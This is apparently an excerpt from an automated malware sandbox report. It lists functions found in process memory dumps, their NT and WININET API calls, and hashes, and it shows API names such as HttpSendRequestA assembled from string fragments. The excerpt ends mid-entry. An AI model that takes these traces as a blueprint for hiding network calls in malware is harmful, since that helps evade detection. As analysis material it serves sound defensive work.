Instruction Fuzzy Hash: 37F019B2214149ABCB08CFA8D884CEB77ADBF8C310B04824CFA0CD7211D630E811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 027E86DB, Relevance: 3.0, APIs: 2, Instructions: 38nativefileCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(027E3D62,5E972F65,FFFFFFFF,027E3A21,?,?,027E3D62,?,027E3A21,FFFFFFFF,5E972F65,027E3D62,?,00000000), ref: 027E86A5
NtClose.NTDLL(027E3D40,?,?,027E3D40,00000000,FFFFFFFF), ref: 027E8705

Memory Dump Source

Source File: 0000000D.00000002.37528295705.00000000027D0000.00000040.00020000.sdmp, Offset: 027D0000, based on PE: false

Yara matches

Similarity

API ID: CloseFileRead
String ID:
API String ID: 752142053-0
Opcode ID: 0003137533a42c008fdecdbb09db94ba3249129c56d244d26fd313a8906a60a3
Instruction ID: 6e1ef183b50f84589c1d49a89afb47601e8736a31c0e394562ed94f506654fbe
Opcode Fuzzy Hash: 0003137533a42c008fdecdbb09db94ba3249129c56d244d26fd313a8906a60a3
Instruction Fuzzy Hash: D7F0D4B6200208ABDB14EF99DC84EAB77ADEF8C760F148559FA1D97241D630F9118BB4

Uniqueness

Uniqueness Score: -1.00%

Function 027E8660, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(027E3D62,5E972F65,FFFFFFFF,027E3A21,?,?,027E3D62,?,027E3A21,FFFFFFFF,5E972F65,027E3D62,?,00000000), ref: 027E86A5

Memory Dump Source

Source File: 0000000D.00000002.37528295705.00000000027D0000.00000040.00020000.sdmp, Offset: 027D0000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: 97a241dc21d58ef930c7bcf0ac7a92ec51789d50694b7e3974adb9fccb89af2c
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: B6F0B7B2200208AFCB14DF89DC84EEB77ADEF8C754F158248BE1D97241DA30E811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 027E865A, Relevance: 1.5, APIs: 1, Instructions: 34filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(027E3D62,5E972F65,FFFFFFFF,027E3A21,?,?,027E3D62,?,027E3A21,FFFFFFFF,5E972F65,027E3D62,?,00000000), ref: 027E86A5

Memory Dump Source

Source File: 0000000D.00000002.37528295705.00000000027D0000.00000040.00020000.sdmp, Offset: 027D0000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 8cba6eaf8acc05379cb24f6e09b9366d8754773e08ad628b201e5434d0f05e64
Instruction ID: 352ccca1d4aef26fa24d063d371f25c731997d9e5b8238921d2bb620bc6d7a73
Opcode Fuzzy Hash: 8cba6eaf8acc05379cb24f6e09b9366d8754773e08ad628b201e5434d0f05e64
Instruction Fuzzy Hash: A6F017B6210148ABCB04DF98D894CEB77ADEF8C314B15865DFA1D97201C630E855CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 027E8790, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,027D2D11,00002000,00003000,00000004), ref: 027E87C9

Memory Dump Source

Source File: 0000000D.00000002.37528295705.00000000027D0000.00000040.00020000.sdmp, Offset: 027D0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: 5f13baa20b1530ac93c05bcdfdf46d94c1e1f0597c855513529c60d328958cd3
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction Fuzzy Hash: B5F015B2200208ABCB14DF89CC84EAB77ADAF8C750F118148BE0997241C630F810CBF0

Uniqueness

Uniqueness Score: -1.00%

Function 027E86E0, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(027E3D40,?,?,027E3D40,00000000,FFFFFFFF), ref: 027E8705

Memory Dump Source

Source File: 0000000D.00000002.37528295705.00000000027D0000.00000040.00020000.sdmp, Offset: 027D0000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: ba8991b5c076a045d4b39657def3f354940de3b701f1e82e12c1752af8a56604
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: 64D01276200214ABD710EB98CC49E97775DEF48750F154459BA195B241D530F50086E0

Uniqueness

Uniqueness Score: -1.00%

Function 049D2CF0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 049D2CFA

Memory Dump Source

Source File: 0000000D.00000002.37534793009.0000000004960000.00000040.00000001.sdmp, Offset: 04960000, based on PE: true

Associated: 0000000D.00000002.37536453350.0000000004A89000.00000040.00000001.sdmp Download File
Associated: 0000000D.00000002.37536543338.0000000004A8D000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b12cac55d06c4d1fa72598aeb5c5a0c839a9a7376b04943ccd11f89b2e624051
Instruction ID: 6e18f6d74198114afa1b6e96f9d5fe9622745cd6b74dff38e5a9d8584f065cd1
Opcode Fuzzy Hash: b12cac55d06c4d1fa72598aeb5c5a0c839a9a7376b04943ccd11f89b2e624051
Instruction Fuzzy Hash: 1B90022124214152B946F2994504517405697E0285791C426A5505A50CC536E857E621

Uniqueness

Uniqueness Score: -1.00%

Function 049D2C30, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 049D2C3A

Memory Dump Source

Source File: 0000000D.00000002.37534793009.0000000004960000.00000040.00000001.sdmp, Offset: 04960000, based on PE: true

Associated: 0000000D.00000002.37536453350.0000000004A89000.00000040.00000001.sdmp Download File
Associated: 0000000D.00000002.37536543338.0000000004A8D000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e2b27485b62640396fdea6579a7bbb466906bb02aee6bea1f8971e77ada262f8
Instruction ID: f920b586bacbdc535fcc090f91899485a07a713cff073e8e2e47c91a5073ff26
Opcode Fuzzy Hash: e2b27485b62640396fdea6579a7bbb466906bb02aee6bea1f8971e77ada262f8
Instruction Fuzzy Hash: D190022921310002F581B299550861A005587D1246F91D829A4106658CC925D86A6321

Uniqueness

Uniqueness Score: -1.00%

Function 049D2DC0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 049D2DCA

Memory Dump Source

Source File: 0000000D.00000002.37534793009.0000000004960000.00000040.00000001.sdmp, Offset: 04960000, based on PE: true

Associated: 0000000D.00000002.37536453350.0000000004A89000.00000040.00000001.sdmp Download File
Associated: 0000000D.00000002.37536543338.0000000004A8D000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ce2f1d4bcbe1f146d9c2cb15a0b34f7e158b35ff3c5ab88b6a778bd40f1f6140
Instruction ID: 27445b0f416e3185dd96977986ea23a1d3b8c5eeaf6c11ed559370e51ab0ecd3
Opcode Fuzzy Hash: ce2f1d4bcbe1f146d9c2cb15a0b34f7e158b35ff3c5ab88b6a778bd40f1f6140
Instruction Fuzzy Hash: 2290027120110402F541B2994504756005587D0345F51C425A9155654EC669DDD67665

Uniqueness

Uniqueness Score: -1.00%

Function 049D2D10, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 049D2D1A

Memory Dump Source

Source File: 0000000D.00000002.37534793009.0000000004960000.00000040.00000001.sdmp, Offset: 04960000, based on PE: true

Associated: 0000000D.00000002.37536453350.0000000004A89000.00000040.00000001.sdmp Download File
Associated: 0000000D.00000002.37536543338.0000000004A8D000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ee8c5c50d90fde9f396412362c6c79155164a969de8f018ec4dea77fce71e45c
Instruction ID: 46ffd4bf9f3f7b522abf97f93a835ce5d0b0f2ad5260e8056c14f1c5e638454f
Opcode Fuzzy Hash: ee8c5c50d90fde9f396412362c6c79155164a969de8f018ec4dea77fce71e45c
Instruction Fuzzy Hash: F290023120110413F512B2994604717005987D0285F91C826A4515658DD666D953B121

Uniqueness

Uniqueness Score: -1.00%

Function 049D2E50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 049D2E5A

Memory Dump Source

Source File: 0000000D.00000002.37534793009.0000000004960000.00000040.00000001.sdmp, Offset: 04960000, based on PE: true

Associated: 0000000D.00000002.37536453350.0000000004A89000.00000040.00000001.sdmp Download File
Associated: 0000000D.00000002.37536543338.0000000004A8D000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: dfa251a8e28d33753012b83337265d414f72bcf093a4b5bf2f255dc0f680ee28
Instruction ID: 68bf577d58d6649632648080c022ba2fd265b53eca51fe0d9e9336c94a8b6ea6
Opcode Fuzzy Hash: dfa251a8e28d33753012b83337265d414f72bcf093a4b5bf2f255dc0f680ee28
Instruction Fuzzy Hash: 5C90026134110442F501B2994514B160055C7E1345F51C429E5155654DC629DC537126

Uniqueness

Uniqueness Score: -1.00%

Function 049D2FB0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 049D2FBA

Memory Dump Source

Source File: 0000000D.00000002.37534793009.0000000004960000.00000040.00000001.sdmp, Offset: 04960000, based on PE: true

Associated: 0000000D.00000002.37536453350.0000000004A89000.00000040.00000001.sdmp Download File
Associated: 0000000D.00000002.37536543338.0000000004A8D000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ecf04e6e404c4681591a3c33a13a6fad95a6688129a186960546a4a53e3af227
Instruction ID: 9cf383b60262bddfd01407adeabf3ee6ea8af743f41e24cfefcfe446f3a6f456
Opcode Fuzzy Hash: ecf04e6e404c4681591a3c33a13a6fad95a6688129a186960546a4a53e3af227
Instruction Fuzzy Hash: 2890022124110802F541B29985147170056C7D0645F51C425A4115654DC626D96676B1

Uniqueness

Uniqueness Score: -1.00%

Function 049D2F00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 049D2F0A

Memory Dump Source

Source File: 0000000D.00000002.37534793009.0000000004960000.00000040.00000001.sdmp, Offset: 04960000, based on PE: true

Associated: 0000000D.00000002.37536453350.0000000004A89000.00000040.00000001.sdmp Download File
Associated: 0000000D.00000002.37536543338.0000000004A8D000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 54e6d26499fbed08098531675740874bd20c79d4e166d72008f3cb40c40db719
Instruction ID: 6e94fcb621f4b35943244605a829617777ec4f55b709664cbac5a911eaeb684b
Opcode Fuzzy Hash: 54e6d26499fbed08098531675740874bd20c79d4e166d72008f3cb40c40db719
Instruction Fuzzy Hash: E790022121190042F601B6A94D14B17005587D0347F51C529A4245654CC925D8626521

Uniqueness

Uniqueness Score: -1.00%

Function 049D29F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 049D29FA

Memory Dump Source

Source File: 0000000D.00000002.37534793009.0000000004960000.00000040.00000001.sdmp, Offset: 04960000, based on PE: true

Associated: 0000000D.00000002.37536453350.0000000004A89000.00000040.00000001.sdmp Download File
Associated: 0000000D.00000002.37536543338.0000000004A8D000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a65ff8742681f922bdfa1aa6917d21d6ed71aa96aa0168211807b66c8b0bb37f
Instruction ID: b0a27111660ddd6e473c10905a8f4bfc044282772f497a9951687002312b2dea
Opcode Fuzzy Hash: a65ff8742681f922bdfa1aa6917d21d6ed71aa96aa0168211807b66c8b0bb37f
Instruction Fuzzy Hash: 70900225211100036506F6990704517009687D5395351C435F5106650CD631D8626121

Uniqueness

Uniqueness Score: -1.00%

Function 049D2A80, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 049D2A8A

Memory Dump Source

Source File: 0000000D.00000002.37534793009.0000000004960000.00000040.00000001.sdmp, Offset: 04960000, based on PE: true

Associated: 0000000D.00000002.37536453350.0000000004A89000.00000040.00000001.sdmp Download File
Associated: 0000000D.00000002.37536543338.0000000004A8D000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f3f563528808a24a71b82b2b6de2318881e89ac4758c7148c48aede6227a4019
Instruction ID: ebefc1cc525802010880ebd34e751b0e8ef9bec769bbd97edafc7b8f18ba3a45
Opcode Fuzzy Hash: f3f563528808a24a71b82b2b6de2318881e89ac4758c7148c48aede6227a4019
Instruction Fuzzy Hash: 4D90026120210003A506B2994514626405A87E0245B51C435E5105690DC535D8927125

Uniqueness

Uniqueness Score: -1.00%

Function 049D2AC0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 049D2ACA

Memory Dump Source

Source File: 0000000D.00000002.37534793009.0000000004960000.00000040.00000001.sdmp, Offset: 04960000, based on PE: true

Associated: 0000000D.00000002.37536453350.0000000004A89000.00000040.00000001.sdmp Download File
Associated: 0000000D.00000002.37536543338.0000000004A8D000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 952b19f5abc7c263dcc6c51ed073cb98ece143416f126ad38e845d0f580a68f2
Instruction ID: 1da691a90554fc4161f9413b223a628253b6e17f32c30a863a0796e8247c1423
Opcode Fuzzy Hash: 952b19f5abc7c263dcc6c51ed073cb98ece143416f126ad38e845d0f580a68f2
Instruction Fuzzy Hash: A390023160510802F551B2994514756005587D0345F51C425A4115754DC765DA5676A1

Uniqueness

Uniqueness Score: -1.00%

Function 049D2B90, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 049D2B9A

Memory Dump Source

Source File: 0000000D.00000002.37534793009.0000000004960000.00000040.00000001.sdmp, Offset: 04960000, based on PE: true

Associated: 0000000D.00000002.37536453350.0000000004A89000.00000040.00000001.sdmp Download File
Associated: 0000000D.00000002.37536543338.0000000004A8D000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: eafad5b91aae52c276673fb12c63d6b8cc8db12cad36045cb1c095cbf9826161
Instruction ID: 4697ff820902d94c7fd5fc8d49dbae64c6fd00c6154cb480872827e7323f1e17
Opcode Fuzzy Hash: eafad5b91aae52c276673fb12c63d6b8cc8db12cad36045cb1c095cbf9826161
Instruction Fuzzy Hash: 8190023120118802F511B299850475A005587D0345F55C825A8515758DC6A5D8927121

Uniqueness

Uniqueness Score: -1.00%

Function 049D2B80, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 049D2B8A

Memory Dump Source

Source File: 0000000D.00000002.37534793009.0000000004960000.00000040.00000001.sdmp, Offset: 04960000, based on PE: true

Associated: 0000000D.00000002.37536453350.0000000004A89000.00000040.00000001.sdmp Download File
Associated: 0000000D.00000002.37536543338.0000000004A8D000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5f77bbc9089931837eabf30095e9f486d2c5fe9e123889e7c06ae0e693d32b10
Instruction ID: c6a2ae230d69c395411d563f207d8ce66123df98a1ce56a3799c8e4bdd72f1b7
Opcode Fuzzy Hash: 5f77bbc9089931837eabf30095e9f486d2c5fe9e123889e7c06ae0e693d32b10
Instruction Fuzzy Hash: 3B90023120110842F501B2994504B56005587E0345F51C42AA4215754DC625D8527521

Uniqueness

Uniqueness Score: -1.00%

Function 049D2BC0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 049D2BCA

Memory Dump Source

Source File: 0000000D.00000002.37534793009.0000000004960000.00000040.00000001.sdmp, Offset: 04960000, based on PE: true

Associated: 0000000D.00000002.37536453350.0000000004A89000.00000040.00000001.sdmp Download File
Associated: 0000000D.00000002.37536543338.0000000004A8D000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1f952c50a2a4cc88d67bf7b44503aa001f250453587baef261ee1e9c9629d5d9
Instruction ID: 380e7e187b45d46487e5a6bf1a31036236c2f5380e671da93f28410f1ee398b9
Opcode Fuzzy Hash: 1f952c50a2a4cc88d67bf7b44503aa001f250453587baef261ee1e9c9629d5d9
Instruction Fuzzy Hash: 6D90023120110402F501B6D95508656005587E0345F51D425A9115655EC675D8927131

Uniqueness

Uniqueness Score: -1.00%

Function 049D2B10, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 049D2B1A

Memory Dump Source

Source File: 0000000D.00000002.37534793009.0000000004960000.00000040.00000001.sdmp, Offset: 04960000, based on PE: true

Associated: 0000000D.00000002.37536453350.0000000004A89000.00000040.00000001.sdmp Download File
Associated: 0000000D.00000002.37536543338.0000000004A8D000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 41be5d0a707421e68b1c1c1f96fc950b726154b9a6c9037435a958fe32a23810
Instruction ID: 1f36d54c415675d4800681b4c2de9930f75d818519d6065dfcfae641b77db852
Opcode Fuzzy Hash: 41be5d0a707421e68b1c1c1f96fc950b726154b9a6c9037435a958fe32a23810
Instruction Fuzzy Hash: 2B90023120110802F581B299450465A005587D1345F91C429A4116754DCA25DA5A77A1

Uniqueness

Uniqueness Score: -1.00%

Function 049D2B00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 049D2B0A

Memory Dump Source

Source File: 0000000D.00000002.37534793009.0000000004960000.00000040.00000001.sdmp, Offset: 04960000, based on PE: true

Associated: 0000000D.00000002.37536453350.0000000004A89000.00000040.00000001.sdmp Download File
Associated: 0000000D.00000002.37536543338.0000000004A8D000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bbea6ea636192838c022b9a0f77cd64edb93f9f00cbc34f7d6328f04f8fe7919
Instruction ID: 9dfda56663784e92e4232e1b55439f7fe55580032e1f396a9bacd54fe4362634
Opcode Fuzzy Hash: bbea6ea636192838c022b9a0f77cd64edb93f9f00cbc34f7d6328f04f8fe7919
Instruction Fuzzy Hash: 5790023120514842F541B2994504A56006587D0349F51C425A4155794DD635DD56B661

Uniqueness

Uniqueness Score: -1.00%

Function 049D34E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 049D34EA

Memory Dump Source

Source File: 0000000D.00000002.37534793009.0000000004960000.00000040.00000001.sdmp, Offset: 04960000, based on PE: true

Associated: 0000000D.00000002.37536453350.0000000004A89000.00000040.00000001.sdmp Download File
Associated: 0000000D.00000002.37536543338.0000000004A8D000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d13df0ed5a1dc459703546dd416dcb226ef7b2e701e4e3e68e15733a9c432793
Instruction ID: a1681d960c733b938f907953e8b37fb985eed4937ffddcdff2438d1116a832b4
Opcode Fuzzy Hash: d13df0ed5a1dc459703546dd416dcb226ef7b2e701e4e3e68e15733a9c432793
Instruction Fuzzy Hash: 2490023160520402F501B2994614716105587D0245F61C825A4515668DC7A5D95275A2

Uniqueness

Uniqueness Score: -1.00%

Function 027E8D40, Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 42networkCOMMON

Download Yara Rule

APIs

HttpSendRequestA.WININET(RequestA,SendRequestA,HttpSendRequestA,00000000,?,?,?,?,00000000), ref: 027E8D9C

Strings

RequestA, xrefs: 027E8D96, 027E8D9B
HttpSendRequestA, xrefs: 027E8D8E, 027E8D99
estA, xrefs: 027E8D6F
Requ, xrefs: 027E8D68
HttpSendRequestA, xrefs: 027E8D4D, 027E8D50
Http, xrefs: 027E8D5A
SendRequestA, xrefs: 027E8D92, 027E8D9A
Send, xrefs: 027E8D61

Memory Dump Source

Source File: 0000000D.00000002.37528295705.00000000027D0000.00000040.00020000.sdmp, Offset: 027D0000, based on PE: false

Yara matches

Similarity

API ID: HttpRequestSend
String ID: Http$HttpSendRequestA$HttpSendRequestA$Requ$RequestA$Send$SendRequestA$estA
API String ID: 360639707-2503632690
Opcode ID: 59ee1c1fde48dd7e1995adb0c33b817c3f2d336c7a31c9a7f5aeb4c8a727f0e6
Instruction ID: 48e5e5cc637cb16c70ced9b782e195453959d36f52c7a8bd482088b742318a68
Opcode Fuzzy Hash: 59ee1c1fde48dd7e1995adb0c33b817c3f2d336c7a31c9a7f5aeb4c8a727f0e6
Instruction Fuzzy Hash: FD014FB2909118AFCB04DF98D8459AF7BBCEB58210F148189FD09AB304D670EE10CBF1

Uniqueness

Uniqueness Score: -1.00%

Function 027E8D3E, Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 38networkCOMMON

Download Yara Rule

APIs

HttpSendRequestA.WININET(RequestA,SendRequestA,HttpSendRequestA,00000000,?,?,?,?,00000000), ref: 027E8D9C

Strings

RequestA, xrefs: 027E8D96, 027E8D9B
HttpSendRequestA, xrefs: 027E8D8E, 027E8D99
estA, xrefs: 027E8D6F
Requ, xrefs: 027E8D68
HttpSendRequestA, xrefs: 027E8D4D, 027E8D50
Http, xrefs: 027E8D5A
SendRequestA, xrefs: 027E8D92, 027E8D9A
Send, xrefs: 027E8D61

Memory Dump Source

Source File: 0000000D.00000002.37528295705.00000000027D0000.00000040.00020000.sdmp, Offset: 027D0000, based on PE: false

Yara matches

Similarity

API ID: HttpRequestSend
String ID: Http$HttpSendRequestA$HttpSendRequestA$Requ$RequestA$Send$SendRequestA$estA
API String ID: 360639707-2503632690
Opcode ID: 718bd893b1e8f87d69bcf83535f0f9d00fcdaa08600e0fc6a7a2471ab8039996
Instruction ID: d76d9f2c7dd16c41443dc5a19cc6bbb1a0255520d4ce2b15796b84c759902378
Opcode Fuzzy Hash: 718bd893b1e8f87d69bcf83535f0f9d00fcdaa08600e0fc6a7a2471ab8039996
Instruction Fuzzy Hash: 1E014BB2905118AFCF14CF99C845AEF7B78EF58310F108188FD196B204D2709A10CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 027E8C40, Relevance: 14.0, APIs: 1, Strings: 7, Instructions: 48networkCOMMON

Download Yara Rule

APIs

InternetConnectA.WININET(ConnectA,rnetConnectA,InternetConnectA,00000000,?,?,?,?,?,?,?,00000000), ref: 027E8CA8

Strings

rnetConnectA, xrefs: 027E8C9E, 027E8CA6
ConnectA, xrefs: 027E8CA2, 027E8CA7
Conn, xrefs: 027E8C68
ectA, xrefs: 027E8C6F
InternetConnectA, xrefs: 027E8C9A, 027E8CA5
Inte, xrefs: 027E8C5A
rnet, xrefs: 027E8C61

Memory Dump Source

Source File: 0000000D.00000002.37528295705.00000000027D0000.00000040.00020000.sdmp, Offset: 027D0000, based on PE: false

Yara matches

Similarity

API ID: ConnectInternet
String ID: Conn$ConnectA$Inte$InternetConnectA$ectA$rnet$rnetConnectA
API String ID: 3050416762-1024195942
Opcode ID: 9d030a777e5cccec2ac6e3d13d24fbac149be2e6a7ed5dee5ea452bd7c4c0401
Instruction ID: b60b34131c1e4eb54fcb132c17d0118dc100ed3a6d73242185a476f8de71c2e0
Opcode Fuzzy Hash: 9d030a777e5cccec2ac6e3d13d24fbac149be2e6a7ed5dee5ea452bd7c4c0401
Instruction Fuzzy Hash: CF01E9B2915118AFCB14DF99D941EEF77BDEB48310F154289BE09A7241D630EE10CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 027E8BD0, Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 41networkCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 027E8C27

Strings

rnetOpenA, xrefs: 027E8C21, 027E8C26
InternetOpenA, xrefs: 027E8C1D, 027E8C25
rnet, xrefs: 027E8BF1
A, xrefs: 027E8BFF
Open, xrefs: 027E8BF8
Inte, xrefs: 027E8BEA

Memory Dump Source

Source File: 0000000D.00000002.37528295705.00000000027D0000.00000040.00020000.sdmp, Offset: 027D0000, based on PE: false

Yara matches

Similarity

API ID: InternetOpen
String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
API String ID: 2038078732-3155091674
Opcode ID: 8f93591177d63440a7d4fcc38820cef4d44ce1c8150f9d8762720a548369221d
Instruction ID: 74c877b3e1493992d3ca38d62d2c581498b04fb1d2c48168ffb50e99a73a173e
Opcode Fuzzy Hash: 8f93591177d63440a7d4fcc38820cef4d44ce1c8150f9d8762720a548369221d
Instruction Fuzzy Hash: 6DF019B2902118AF8B14DFD9DC419FBB7BCEF48310B048589BE18A7241D634AA10CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 027E8E20, Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 34networkCOMMON

Download Yara Rule

APIs

InternetCloseHandle.WININET(CloseHandle,?,?,?,00000000), ref: 027E8E6F

Strings

Clos, xrefs: 027E8E48
rnet, xrefs: 027E8E41
CloseHandle, xrefs: 027E8E6B, 027E8E6E
eHan, xrefs: 027E8E4F
dle, xrefs: 027E8E56
Inte, xrefs: 027E8E3A

Memory Dump Source

Source File: 0000000D.00000002.37528295705.00000000027D0000.00000040.00020000.sdmp, Offset: 027D0000, based on PE: false

Yara matches

Similarity

API ID: CloseHandleInternet
String ID: Clos$CloseHandle$Inte$dle$eHan$rnet
API String ID: 1081599783-4067651292
Opcode ID: 0e14ef5a2133572a007edb29d6b0d1ac0ce457eeba957283f8b59f320c40486f
Instruction ID: 2aabd7f4ef122154ea7765ca867d492cc994e3109ef2270e6617898b40f9f175
Opcode Fuzzy Hash: 0e14ef5a2133572a007edb29d6b0d1ac0ce457eeba957283f8b59f320c40486f
Instruction Fuzzy Hash: B2F030B2D05118AF8B10EFD9D9459EFBBBCEB44310F108189EE496B211D6719B10CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 027E8E16, Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 31networkCOMMON

Download Yara Rule

APIs

InternetCloseHandle.WININET(CloseHandle,?,?,?,00000000), ref: 027E8E6F

Strings

Clos, xrefs: 027E8E48
rnet, xrefs: 027E8E41
CloseHandle, xrefs: 027E8E6B, 027E8E6E
eHan, xrefs: 027E8E4F
dle, xrefs: 027E8E56
Inte, xrefs: 027E8E3A

Memory Dump Source

Source File: 0000000D.00000002.37528295705.00000000027D0000.00000040.00020000.sdmp, Offset: 027D0000, based on PE: false

Yara matches

Similarity

API ID: CloseHandleInternet
String ID: Clos$CloseHandle$Inte$dle$eHan$rnet
API String ID: 1081599783-4067651292
Opcode ID: 50bfe2b1f976d50ff5690e869a8451c3f522ac5b00bdeefe0a616caae1be70b1
Instruction ID: 43bb8a17ffb592689deffc166cbf50d6cfbbe363fad0ae172d0f942fb47a867f
Opcode Fuzzy Hash: 50bfe2b1f976d50ff5690e869a8451c3f522ac5b00bdeefe0a616caae1be70b1
Instruction Fuzzy Hash: F0F054B2C05119EF8B11EFD9D945ADFBB78EF04350F108199EA49BB251D6719B00CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 027E72D0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000007D0), ref: 027E7378

Strings

wininet.dll, xrefs: 027E732E, 027E7337
net.dll, xrefs: 027E7341, 027E73C7, 027E739F, 027E73AB, 027E73D3

Memory Dump Source

Source File: 0000000D.00000002.37528295705.00000000027D0000.00000040.00020000.sdmp, Offset: 027D0000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 17708b47087b6ac9d6145b5a380d951523266d6e3734ac9a8f071eef17d3962e
Instruction ID: ca7f3f280430be4d6d95eb28602cf3f9f67c75a8e4d3eb3566c4f483d50924a9
Opcode Fuzzy Hash: 17708b47087b6ac9d6145b5a380d951523266d6e3734ac9a8f071eef17d3962e
Instruction Fuzzy Hash: 76318FB6541700ABCB15EF64C8A4FABF7B9EF4C704F00811DFA1A9B241D730A545CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 027E72C6, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 85sleepCOMMON

Download Yara Rule

APIs

